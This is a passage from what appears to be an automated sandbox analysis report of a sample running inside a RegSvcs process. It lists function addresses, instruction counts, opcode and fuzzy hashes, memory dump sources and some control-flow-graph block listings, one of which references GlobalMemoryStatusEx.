                                  • Opcode Fuzzy Hash: 6c4ab8330112a4efb33e4b25a482379a06368f34931989372d8a8f08f22ff298
                                  • Instruction Fuzzy Hash: 2051D632B042568FCB88CB74C5506AFBBBABF89600F5094AAD916FB354DB31DD05CB91
                                  Function 02BF0F88 Relevance: .1, Instructions: 134COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 69c9daad2ad96e0faf9a1eb60f3d8a46b8b21dc4357c9bf60a4ca5874997d3a7
                                  • Instruction ID: 1c7397cb819031a6b87f283e395007d162a96932b10705e029526cffaf351df6
                                  • Opcode Fuzzy Hash: 69c9daad2ad96e0faf9a1eb60f3d8a46b8b21dc4357c9bf60a4ca5874997d3a7
                                  • Instruction Fuzzy Hash: 9241D871B1021A8FCB48DB68C454AAEFBF6FB88300F11846AD515BB765CB308D05CB91
                                  Function 02BF6A10 Relevance: .1, Instructions: 125COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b10b65cf7e3e89ad01dabd467d2eff9d6f783c3c759571c60264aedf5183b233
                                  • Instruction ID: cfe1f0caeab1f60d1d39b3a60dc3b914d585caf8197f48c8ab849d6ecb26a5c0
                                  • Opcode Fuzzy Hash: b10b65cf7e3e89ad01dabd467d2eff9d6f783c3c759571c60264aedf5183b233
                                  • Instruction Fuzzy Hash: 28518074E002069FDB49DBB4D8556AEBBB6EBC8300F20C469C526EB359EB309E45CF50
                                  Function 02BF6A20 Relevance: .1, Instructions: 121COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2e30d9ef0087d631d287f1bed3f51fdcea1c57b945f689381e32fb8e90462dc9
                                  • Instruction ID: adbc5edfcd58fd731dd63c2678bc982beefe5e78492d9b630556a4a7853a99f7
                                  • Opcode Fuzzy Hash: 2e30d9ef0087d631d287f1bed3f51fdcea1c57b945f689381e32fb8e90462dc9
                                  • Instruction Fuzzy Hash: 8B418274E102069FDB48DBA4D9556AEBBB6FBC8300F10C469C526EB359EB309A41CF50
                                  Function 02BF641B Relevance: .1, Instructions: 111COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f36cb298f5d89eb8526028317dfbfdccbee5506f9784ebbe1da5368976066d38
                                  • Instruction ID: 926a15a09bcc8cbcd83c3085f619b008b395cbee9cd7ba7da3d1205dc9cdbf1e
                                  • Opcode Fuzzy Hash: f36cb298f5d89eb8526028317dfbfdccbee5506f9784ebbe1da5368976066d38
                                  • Instruction Fuzzy Hash: 1941D471B102098FCB48DFB4C995AAEBBFAFF8D600F14446AD605EB3A5CA319D05CB50
                                  Function 02BF7830 Relevance: .1, Instructions: 109COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6ca8969107f0cc6b216eaef4a5d6410565f088837aa0a7f3f951fc7f148e221b
                                  • Instruction ID: c739eb552db7b6508f9223c4d904d4594cfb9b780f7ed451993c686ec376b579
                                  • Opcode Fuzzy Hash: 6ca8969107f0cc6b216eaef4a5d6410565f088837aa0a7f3f951fc7f148e221b
                                  • Instruction Fuzzy Hash: FB419C75B501108FC789EF29D908A5AF7B1FB8D610B1684EBDA06DB3A4DB30DC15DB41
                                  Function 056006D0 Relevance: .1, Instructions: 100COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 68605dd9ecb504d340d938a7132948244cb60d39bf742e192f33479cd2a6cde7
                                  • Instruction ID: e2c2fc684e2e6c91be9ee8637eb2c093540c12c54acac2cd69fc3aa535708438
                                  • Opcode Fuzzy Hash: 68605dd9ecb504d340d938a7132948244cb60d39bf742e192f33479cd2a6cde7
                                  • Instruction Fuzzy Hash: 9D313171B182458FD719DB68A95C367BBA7FBC822074A9563D409CB7C9CA34CC42CB91
                                  Function 02BF625F Relevance: .1, Instructions: 95COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9a96b3b3b51bfd8693223b69e88e520d3deaf631b1ada1b5540ef7fe6c4b81b4
                                  • Instruction ID: e7e3e7040492858e9b0ebb6205638a15d16df844fc988fdbf1d65fff5cb0e3c4
                                  • Opcode Fuzzy Hash: 9a96b3b3b51bfd8693223b69e88e520d3deaf631b1ada1b5540ef7fe6c4b81b4
                                  • Instruction Fuzzy Hash: F73147727007048BD798AF7899441AE7BB6FBC81107949A7EC63AEB780DF30C948C751
                                  Function 056006C0 Relevance: .1, Instructions: 94COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1fc3c39998d93b1565a8ffe531803ff582b058b4217ce252c7aba31def1ee5fb
                                  • Instruction ID: 1747f47f95162bc1dcec77f92728576eb4739af6f9a9482c909fb709d813cba1
                                  • Opcode Fuzzy Hash: 1fc3c39998d93b1565a8ffe531803ff582b058b4217ce252c7aba31def1ee5fb
                                  • Instruction Fuzzy Hash: 00313F71A181058FD758DBA8A95C3B7BBA7FBC822074A952BD009CB384C634CC42CB81
                                  Function 05600AF8 Relevance: .1, Instructions: 91COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9fd2eceb466a1eb1cb67dca53363e54d55f7b0a9351f3c2ae23307757486cb04
                                  • Instruction ID: 5d8ef6fcc97d211a1967256c221af6c8a5eeb0bb522060e5241230cade25cfd3
                                  • Opcode Fuzzy Hash: 9fd2eceb466a1eb1cb67dca53363e54d55f7b0a9351f3c2ae23307757486cb04
                                  • Instruction Fuzzy Hash: 0B21E131B2021D9BD398EA39580973F76D7F788320F946466E909DB280EB31DC46C7D2
                                  Function 05600961 Relevance: .1, Instructions: 87COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: addd9695ee84ced0a82ac2e4a940bb4cbc4b5ef5ecfdf2bf75d613e2cef5c25d
                                  • Instruction ID: 9671a4a23bcd27f00ed2eaf19a7e7e1717889e82e52501b0045d0900e761d1d4
                                  • Opcode Fuzzy Hash: addd9695ee84ced0a82ac2e4a940bb4cbc4b5ef5ecfdf2bf75d613e2cef5c25d
                                  • Instruction Fuzzy Hash: D93159347142148BE788AB7D980972FFAABAFD5220F84651B9512D73D4CF70C9028B81
                                  Function 02BFD401 Relevance: .1, Instructions: 82COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0eac486674235feb42a0fa7908010d29ecd40088d1061ca0289a25bc9ae0ae45
                                  • Instruction ID: 87422106efcb49f27e6b69be297c7013e31f09e5732bce4f03f19f62da61c546
                                  • Opcode Fuzzy Hash: 0eac486674235feb42a0fa7908010d29ecd40088d1061ca0289a25bc9ae0ae45
                                  • Instruction Fuzzy Hash: D9214531F182478BEB9CCA7998847ADB6E3EBC8314F1881B6DB05E7294D731EC58C645
                                  Function 02BF75F0 Relevance: .1, Instructions: 71COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0b812349772a2638493563ba9c28e7eead140ad8de634049bcea9ae11aa1fe3e
                                  • Instruction ID: ca8f2411ee20c0b4c222ce69bf5e6fcaf1b01b0f61aaa8276a0ab6682696a3b8
                                  • Opcode Fuzzy Hash: 0b812349772a2638493563ba9c28e7eead140ad8de634049bcea9ae11aa1fe3e
                                  • Instruction Fuzzy Hash: E9214DB0E15645EFC799DFA9954518EFBF2BBC9200F24C8EBC005D7218E6708A569B40
                                  Function 02BF7600 Relevance: .1, Instructions: 64COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3710d488b3e2064fdac06869d03d9e001e60642608dd407c9ccaf2a8b5d033c2
                                  • Instruction ID: 08b45030fab8dcf651203eae3e61ece1adbf8bfe1dbfdd1264d5f93f8c412919
                                  • Opcode Fuzzy Hash: 3710d488b3e2064fdac06869d03d9e001e60642608dd407c9ccaf2a8b5d033c2
                                  • Instruction Fuzzy Hash: F5213EB0E15605EFC788DF69D64514EFBF6BBC8200F24C8EB8105D7218EB709B469B40
                                  Function 02BFEE98 Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 276 2bfee98-2bfeea3 277 2bfeecd-2bfeeec call 2bfe5f8 276->277 278 2bfeea5-2bfeecc call 2bfe5ec 276->278 284 2bfeeee-2bfeef1 277->284 285 2bfeef2-2bfef51 277->285 292 2bfef57-2bfefe4 GlobalMemoryStatusEx 285->292 293 2bfef53-2bfef56 285->293 297 2bfefed-2bff015 292->297 298 2bfefe6-2bfefec 292->298 298->297
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 351ce3a60c9e2dbdc0366a9e9199388fecc6ea63e6d8c7fe8b24ea02f90c7062
                                  • Instruction ID: ff86ea688c8a5fd95a99e334d19faf07c1b2b2e2276955400438807de437c254
                                  • Opcode Fuzzy Hash: 351ce3a60c9e2dbdc0366a9e9199388fecc6ea63e6d8c7fe8b24ea02f90c7062
                                  • Instruction Fuzzy Hash: 0A411232D043998FDB14DFBAD8007AABBF5EF89210F1485AAE518A7350DB749845CBE1
                                  Function 02BFE5F8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 301 2bfe5f8-2bfefe4 GlobalMemoryStatusEx 304 2bfefed-2bff015 301->304 305 2bfefe6-2bfefec 301->305 305->304
                                  APIs
                                  • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,02BFEEEA), ref: 02BFEFD7
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID: GlobalMemoryStatus
                                  • String ID:
                                  • API String ID: 1890195054-0
                                  • Opcode ID: 29a14127cdef3af1bc2c7d977461b83c6c1c4b84830ac2d44b8a577484a9a09e
                                  • Instruction ID: be330028325f813eb50bcbf999dd54cc8edc9d6c254b74770c7f991616e9ed9a
                                  • Opcode Fuzzy Hash: 29a14127cdef3af1bc2c7d977461b83c6c1c4b84830ac2d44b8a577484a9a09e
                                  • Instruction Fuzzy Hash: 761106B1C0065A9BDB10DF9AC444BAEFBF4EF48620F11816AE514B7250D778A944CFE5
                                  Function 02BFEF68 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 308 2bfef68-2bfefae 310 2bfefb6-2bfefe4 GlobalMemoryStatusEx 308->310 311 2bfefed-2bff015 310->311 312 2bfefe6-2bfefec 310->312 312->311
                                  APIs
                                  • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,02BFEEEA), ref: 02BFEFD7
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID: GlobalMemoryStatus
                                  • String ID:
                                  • API String ID: 1890195054-0
                                  • Opcode ID: 13d0de4a51768d621ad656b7eff523ac422fa5b5e35bc682f51c44d910452e6c
                                  • Instruction ID: 57261cf99716127b7b3837fbbf1b9f75c3d3589bfd7ff640aa56e0794376ba3a
                                  • Opcode Fuzzy Hash: 13d0de4a51768d621ad656b7eff523ac422fa5b5e35bc682f51c44d910452e6c
                                  • Instruction Fuzzy Hash: 201130B1C0025A9BDB10DFAAC444B9EFBF4EB48720F15816AE918A3240D378A914CFA1
                                  Function 05605809 Relevance: .4, Instructions: 441COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 822 5605809-5605825 823 5605831-560583d 822->823 824 5605827-560582c 822->824 827 560584d-5605852 823->827 828 560583f-560584b 823->828 825 5605bc6-5605bcb 824->825 827->825 828->827 830 5605857-5605863 828->830 832 5605873-5605878 830->832 833 5605865-5605871 830->833 832->825 833->832 835 560587d-5605888 833->835 837 5605932-560593d 835->837 838 560588e-5605899 835->838 841 56059e0-56059ec 837->841 842 5605943-5605952 837->842 843 560589b-56058ad 838->843 844 56058af 838->844 851 56059fc-5605a0e 841->851 852 56059ee-56059fa 841->852 853 5605963-5605972 842->853 854 5605954-560595e 842->854 845 56058b4-56058b6 843->845 844->845 849 56058d6-56058db 845->849 850 56058b8-56058c7 845->850 849->825 850->849 856 56058c9-56058d4 850->856 869 5605a10-5605a1c 851->869 870 5605a32-5605a37 851->870 852->851 861 5605a3c-5605a47 852->861 862 5605974-5605980 853->862 863 5605996-560599f 853->863 854->825 856->849 867 56058e0-56058e9 856->867 874 5605b29-5605b34 861->874 875 5605a4d-5605a56 861->875 872 5605982-5605987 862->872 873 560598c-5605991 862->873 876 56059a1-56059b3 863->876 877 56059b5 863->877 882 56058f5-5605904 867->882 883 56058eb-56058f0 867->883 887 5605a28-5605a2d 869->887 888 5605a1e-5605a23 869->888 870->825 872->825 873->825 891 5605b36-5605b40 874->891 892 5605b5e-5605b6d 874->892 889 5605a58-5605a6a 875->889 890 5605a6c 875->890 879 56059ba-56059bc 876->879 877->879 879->841 885 56059be-56059ca 879->885 900 5605906-5605912 882->900 901 5605928-560592d 882->901 883->825 902 56059d6-56059db 885->902 903 56059cc-56059d1 885->903 887->825 888->825 893 5605a71-5605a73 889->893 890->893 905 5605b42-5605b4e 891->905 906 5605b57-5605b5c 891->906 907 5605bc1 892->907 908 5605b6f-5605b7e 892->908 898 5605a83 893->898 899 5605a75-5605a81 893->899 909 5605a88-5605a8a 898->909 899->909 916 5605914-5605919 900->916 917 560591e-5605923 900->917 901->825 902->825 903->825 905->906 919 5605b50-5605b55 905->919 906->825 907->825 908->907 920 5605b80-5605b98 908->920 910 5605a96-5605aa9 909->910 911 5605a8c-5605a91 909->911 921 5605ae1-5605aeb 910->921 922 5605aab 910->922 911->825 916->825 917->825 919->825 932 5605bba-5605bbf 920->932 933 5605b9a-5605bb8 920->933 928 5605b0a-5605b16 921->928 929 5605aed-5605af9 call 5605678 921->929 923 5605aae-5605abf call 5605678 922->923 934 5605ac1-5605ac4 923->934 935 5605ac6-5605acb 923->935 942 5605b18-5605b1d 928->942 943 5605b1f 928->943 939 5605b00-5605b05 929->939 940 5605afb-5605afe 929->940 932->825 933->825 934->935 938 5605ad0-5605ad3 934->938 935->825 944 5605ad9-5605adf 938->944 945 5605bcc-5605c18 938->945 939->825 940->928 940->939 946 5605b24 942->946 943->946 944->921 944->923 983 5605c1b call 5605da0 945->983 984 5605c1b call 5605d90 945->984 946->825 951 5605c21-5605c28 952 5605c2a-5605c35 951->952 953 5605c3b-5605c46 951->953 952->953 956 5605cbe-5605d10 952->956 957 5605d17-5605d5c call 5604688 953->957 958 5605c4c-5605ca9 953->958 956->957 972 5605d6d-5605d7b 957->972 973 5605d5e-5605d6b 957->973 965 5605cb2-5605cbb 958->965 979 5605d89 972->979 980 5605d7d-5605d87 972->980 978 5605d8b-5605d8e 973->978 979->978 980->978 983->951 984->951
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f39507bb68d9e59e2766eb71f4bcdf065891b19c1ce110a794fe80f0a7ec9830
                                  • Instruction ID: a384479630d101f8ea1d7fa7be2970fed6ed3e484870d22c00914680b6a88283
                                  • Opcode Fuzzy Hash: f39507bb68d9e59e2766eb71f4bcdf065891b19c1ce110a794fe80f0a7ec9830
                                  • Instruction Fuzzy Hash: 6CE17D307042108FDB1CAB29C968B3A7BAAFF99600F14586AE507CB7E1DB65DC42CF55
                                  Function 056040D0 Relevance: .4, Instructions: 436COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 44b1e1287ee94a54d41bbc0b80f9000ed5a43e66c7261f47c03eaec5b0432333
                                  • Instruction ID: b8e8fa2a2371223c1874bf614e3138b9dc2e3d2e6abf93290530748b5d6c7f7e
                                  • Opcode Fuzzy Hash: 44b1e1287ee94a54d41bbc0b80f9000ed5a43e66c7261f47c03eaec5b0432333
                                  • Instruction Fuzzy Hash: EF022A30A14109DFCF29CF68D584E6BBBB2FF88302F159654E906AB391DB30E991CB51
                                  Function 05605DA0 Relevance: .4, Instructions: 404COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2781774272021a1922ddf8b5317e84a8bfd04befaeefd0f8119fef3a3b252198
                                  • Instruction ID: a86839ad04501f875d07ee2b74b8dbe3402df8a8cb4f9595f0fd6cbf87fcaee9
                                  • Opcode Fuzzy Hash: 2781774272021a1922ddf8b5317e84a8bfd04befaeefd0f8119fef3a3b252198
                                  • Instruction Fuzzy Hash: 18F11F71E002159FCB18CF6CC988AAEB7F6FF89310B159599E415AB3A1CB71EC51CB50
                                  Function 05609670 Relevance: .4, Instructions: 371COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e5d219bd5331db0cf6e5a13e52af53d2485bf9277de411cc1dcb8193511d40e6
                                  • Instruction ID: 33a976331cd7a8a7ed622860ca8e11607f1c7e7207ecf2dabe6793d8b18f8897
                                  • Opcode Fuzzy Hash: e5d219bd5331db0cf6e5a13e52af53d2485bf9277de411cc1dcb8193511d40e6
                                  • Instruction Fuzzy Hash: ACE13E34A00209DFDB09EBA8D858BAEBBB7FBC8310F158459D806A7395DB319E41DB51
                                  Function 056002AD Relevance: .3, Instructions: 345COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ff6c68dc52f225859197c01b35a2aa078836423badc993bd70f3ecf83d5c30cf
                                  • Instruction ID: 1bd7e2dd6deb616b3f0607691945de1fbf955b9b984f2c6fdf85c4c8538763d4
                                  • Opcode Fuzzy Hash: ff6c68dc52f225859197c01b35a2aa078836423badc993bd70f3ecf83d5c30cf
                                  • Instruction Fuzzy Hash: 50E0D8323082901BD705575D5C50E1BAFA5EFCA360F05486AF484D3212C5105816D3A1
                                  Function 05602428 Relevance: .3, Instructions: 337COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 13f16144e64b27f25c39175ff727577adce274b9e80bfcf11d1a2aacb6789b9e
                                  • Instruction ID: 776aec205f5790304020b8779d67ef33e89189b71ca968a31c1c4519760663c5
                                  • Opcode Fuzzy Hash: 13f16144e64b27f25c39175ff727577adce274b9e80bfcf11d1a2aacb6789b9e
                                  • Instruction Fuzzy Hash: C4C1AD387042519FDB1A9F65C8ACB3F7BA6BF89604F148569E8068B395CF35CC42CB91
                                  Function 056048D0 Relevance: .2, Instructions: 209COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f8031718f1ceb2cec4c6908387e64e07b98e03e73c0501415a61868d4d3875c7
                                  • Instruction ID: 2f95832ae91c2d1e9c6b44a052abbf4f167835bfc1379ed10e0b19029af6f988
                                  • Opcode Fuzzy Hash: f8031718f1ceb2cec4c6908387e64e07b98e03e73c0501415a61868d4d3875c7
                                  • Instruction Fuzzy Hash: FF616D317041159FDF28DF3AC884A6B77EABF88642705546AEA56CB3A5EF20DC11CB50
                                  Function 05601071 Relevance: .1, Instructions: 147COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 227d5409c1fe8dae57a16e16999a09eca888b6fd97a89079cf6880c66253bf71
                                  • Instruction ID: c0cc113fcdd677b3285a2acbf890b6c724ce04d358b93de5732cbdd271249886
                                  • Opcode Fuzzy Hash: 227d5409c1fe8dae57a16e16999a09eca888b6fd97a89079cf6880c66253bf71
                                  • Instruction Fuzzy Hash: A151DD79610240CFC31DEB28D948B1777B2BBC9714B65959AE801DB798EB31ED06CB81
                                  Function 05606548 Relevance: .1, Instructions: 139COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cee7e2a6d3c6977a0ee5f0720fc669742b679aa3d6c89bb89ebacb8b702b5c86
                                  • Instruction ID: 769fdcc4edcd143a01403ea06dfa3faa8dc7b9bf8076e2565b8b44e0fbecc659
                                  • Opcode Fuzzy Hash: cee7e2a6d3c6977a0ee5f0720fc669742b679aa3d6c89bb89ebacb8b702b5c86
                                  • Instruction Fuzzy Hash: 64513B71A10225DFCB18CF68C588A6ABBF1FF44314B168499E819AB3A1C730ED91CB91
                                  Function 056046C0 Relevance: .1, Instructions: 113COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1164255151abdbca12670444b1640543a7d25f9cb700ad11f77918aab09d2890
                                  • Instruction ID: 3eaa7a42a61777e6d12b81da87cf6e4db7b03f4ae069605b2f99947bbf607874
                                  • Opcode Fuzzy Hash: 1164255151abdbca12670444b1640543a7d25f9cb700ad11f77918aab09d2890
                                  • Instruction Fuzzy Hash: 614159756441559FCB29CF29D848A7A7BB2FF49312F1104A5EA02CB3A1CB31DC90CB91
                                  Function 05605678 Relevance: .1, Instructions: 101COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 37ab96dad5edc63ed1d405ff12ad4d5d5dad68b2ec916230bb6d483c5ac3195b
                                  • Instruction ID: 5a7e1ff3ee9e9104d205ccfd3a06c814f22e5c79c723d2e8d9439722c2089cb1
                                  • Opcode Fuzzy Hash: 37ab96dad5edc63ed1d405ff12ad4d5d5dad68b2ec916230bb6d483c5ac3195b
                                  • Instruction Fuzzy Hash: 3E31AC34318205CFDB2DCB25A894A3F7BAAFB94650B146956D053CB3E1DA24CC80EF82
                                  Function 05601B50 Relevance: .1, Instructions: 101COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
